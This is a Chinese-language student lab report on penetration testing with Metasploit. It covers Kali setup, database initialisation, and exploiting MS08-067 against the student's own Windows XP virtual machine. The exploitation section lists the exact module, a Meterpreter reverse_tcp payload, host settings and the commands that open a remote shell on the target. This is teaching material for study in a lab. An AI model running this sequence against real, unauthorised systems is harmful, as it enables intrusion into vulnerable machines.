软件安全实验三——实验报告
实验要求
使用渗透性测试工具 Metasploit 进行漏洞测试。实验内容如下。
1)安装并配置Kali(https://www.kali.org)。
2)从Kali 操作系统的终端初始化和启动Metasploit 工具。
3)使用 Metasploit 挖掘 MS08-067 等漏洞。
实验过程
一 安装并配置Kali
在Get Kali | Kali Linux中下载kali-linux-2024.3-vmware-amd64.7z并解压。
![4677d3c8b57a97876e5a46a5658eb514]()
在VMware WorkStation中,点击“打开虚拟机”,选择刚刚下载的镜像。
![9ae5bd532a4d8d5f6e02cda74156dc29]()
启动虚拟机,输入账户密码(默认均为kali),进入桌面。
![image-20241210160430438]()
![image-20241210160508753]()
二 初始化和启动Metasploit 工具
通过以下命令设置和初始化 Metasploit 的数据库
1
2
3
4service --status-all
service postgresql start
service postgresql status
msfdb init![image-20241210161524862]()
![image-20241210161617700]()
![image-20241210161717136]()
然后启动 Metasploit 工具并检查db状态。
1
2msfconsole
msf6 > db_status![image-20241210161948109]()
三 挖掘 MS08-067 等漏洞
准备靶机。
在VMware WorkStation中创建一个虚拟机,使用windows xp home edition镜像,按提示完成安装。
![image-20241210165636348]()
然后关闭系统防火墙。
![image-20241210165825797]()
打开命令行,输入
ipconfig查看ip为:192.168.65.129。![image-20241210170052464]()
查看kali机的ip为192.168.65.130,并测试能否ping通windows机:
![image-20241218160403878]()
渗透攻击。
先输入
msfconsole进入msf6终端:![image-20241218155640851]()
然后输入
search ms08_067查看该漏洞:![image-20241218155756403]()
下面是要攻击的target:
![image-20241218161045220]()
输入
use exploit/windows/smb/ms08_067_netapi加载该模块,然后输入show payloads查看可用的攻击载荷。![image-20241218155852123]()
下面这个是需要的payload:
![image-20241218160859967]()
然后:
1
2
3
4
5set LHOST 192.168.65.130 # Kali虚拟机ip
set RHOST 192.168.65.129 # windows xp靶机ip
set payload windows/meterpreter/reverse_tcp
set target 34
show options![image-20241218161227701]()
输入
exploit进行攻击:![image-20241218161332072]()
在输入
shell进入靶机命令行:![image-20241218161439683]()
测试确实是windows靶机的ip:
![image-20241218161515287]()
成功!




















